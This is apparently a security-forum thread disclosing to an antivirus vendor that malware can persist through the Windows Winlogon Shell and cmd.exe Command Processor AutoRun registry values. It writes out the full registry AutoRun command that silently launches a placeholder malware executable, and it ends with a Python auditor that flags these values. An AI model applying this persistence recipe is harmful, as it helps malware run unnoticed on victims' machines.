Alternative way to make malware run at Windows start not detected as suspicious

To start with Windows, most malware is added as a service, to app autostart lists or to the Windows scheduler.

Comodo reports some suspicious autorun entries but totally ignores another way to configure malware to be autostarted.

E.g. you can add the malware as an AutoRun entry of cmd rather than a system autorun, by configuring the command processor, so it's executed every time cmd.exe is launched.

A commonly used strategy usually consists of these steps:


As the first action, replace the default system shell explorer.exe with the command prompt by adding a Windows registry key in

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

with the Shell entry set to cmd.exe

so Windows launches the command prompt executable at start rather than explorer.exe


Add a registry entry to configure the command processor in a similar way

[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]
"AutoRun"="[at]mode 20,5 & tasklist /FI \"IMAGENAME eq MalwareExecutable.exe\" 2>NUL | find /I /N \"MalwareExecutable.exe\">NUL && exit & if exist \"C:\\Users\\someusername\\AppData\\Roaming\\Microsoft\\MalwareExecutable.exe\" ( start /MIN \"\" \"C:\\Users\\someusername\\AppData\\Roaming\\Microsoft\\MalwareExecutable.exe\" & tasklist /FI \"IMAGENAME eq explorer.exe\" 2>NUL | find /I /N \"explorer.exe\">NUL && exit & explorer.exe & exit ) else ( tasklist /FI \"IMAGENAME eq explorer.exe\" 2>NUL | find /I /N \"explorer.exe\">NUL && exit & explorer.exe & exit )"

So every time cmd runs, it executes the malware and starts explorer.exe.

The user doesn't see that explorer.exe is no longer the default system shell, because the command also launches explorer.exe in addition to cmd.exe, with the edited command processor that runs the malware executable.

Regardless of the fact that the malware executable is detected, this kind of behavior should at least be reported as suspicious at the end of an antivirus scan.

If I am not mistaken, although this may launch malware.exe, CIS is still going to block it, as the .exe will be flagged as either unknown or malicious.

Please try it yourself and see what happens.
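
A check for the two registry values discussed in this thread, as an added example that is not code from either poster or from Comodo: it audits the text of a `reg export` file and flags a Winlogon Shell value other than explorer.exe and any non-empty Command Processor AutoRun. The function name and the sample export are constructed for illustration; it assumes the export has already been decoded to text, and it also covers the HKEY_LOCAL_MACHINE copies of both keys, which goes beyond the HKEY_CURRENT_USER case in the first post.

```python
import re

# Registry locations named in the thread, matched as key-path suffixes so
# both the HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE copies are covered.
WINLOGON = r"\microsoft\windows nt\currentversion\winlogon"
CMD_PROC = r"\microsoft\command processor"
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

# Constructed sample export for illustration (not taken from a real host).
SAMPLE = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="cmd.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]
"AutoRun"="start /MIN \"\" \"C:\\Users\\someusername\\AppData\\Roaming\\Microsoft\\MalwareExecutable.exe\""
"CompletionChar"=dword:00000009
'''


def audit_reg_export(text):
    """Return (key, value_name, data, reason) for each suspicious string value."""
    findings, key = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]          # remember the current key header
            continue
        m = VALUE_RE.match(line)      # only "name"="string" lines match
        if not (key and m):
            continue
        # Undo .reg escaping of backslashes and double quotes.
        name, data = (re.sub(r"\\(.)", r"\1", g) for g in m.groups())
        k = key.lower()
        if k.endswith(WINLOGON) and name.lower() == "shell":
            if data.strip().lower() != "explorer.exe":
                findings.append((key, name, data, "Winlogon Shell is not explorer.exe"))
        elif k.endswith(CMD_PROC) and name.lower() == "autorun" and data.strip():
            findings.append((key, name, data, "cmd.exe AutoRun command is set"))
    return findings


if __name__ == "__main__":
    for key, name, data, reason in audit_reg_export(SAMPLE):
        print(f"{reason}: [{key}] {name} = {data}")
```

Files written by `reg export` are UTF-16 encoded, so open them with `encoding="utf-16"` before passing the text in.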